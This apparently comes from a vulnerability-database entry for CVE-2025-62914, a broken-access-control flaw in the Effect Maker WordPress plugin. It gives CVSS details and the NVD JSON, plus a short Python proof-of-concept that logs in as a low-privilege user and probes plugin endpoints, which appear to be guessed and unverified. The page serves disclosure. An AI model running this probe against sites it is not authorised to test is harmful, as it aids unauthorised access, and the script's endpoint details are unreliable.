Security Vulnerability Report
中文
CVE-2025-62914 CVSS 6.5 MEDIUM

CVE-2025-62914

Published: 2025-11-06 16:16:13
Last Modified: 2026-04-27 17:16:34

Description

Missing Authorization vulnerability in anibalwainstein Effect Maker effect-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Effect Maker: from n/a through <= 1.2.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Effect Maker WordPress插件 <= 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62914 PoC - Effect Maker Unauthorized Access # Author: Security Researcher # Target: WordPress with Effect Maker plugin <= 1.2.1 import requests import sys target_url = input("Enter target URL: ") username = input("Enter low-privilege username: ") password = input("Enter password: ") session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) print(f"[+] Login attempt: {response.status_code}") # Step 2: Identify Effect Maker vulnerable endpoints vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=effect_maker_admin_action', '/wp-json/effect-maker/v1/config', '/wp-admin/admin.php?page=effect-maker-settings' ] # Step 3: Exploit the missing authorization for endpoint in vulnerable_endpoints: target = target_url + endpoint print(f"[*] Testing endpoint: {endpoint}") try: response = session.get(target, timeout=10) if response.status_code == 200: print(f"[+] Potential unauthorized access to: {endpoint}") print(f" Response preview: {response.text[:200]}...") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] PoC execution completed. Manual verification required.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62914", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:13.390", "lastModified": "2026-04-27T17:16:34.293", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in anibalwainstein Effect Maker effect-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Effect Maker: from n/a through <= 1.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/effect-maker/vulnerability/wordpress-effect-maker-plugin-1-2-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}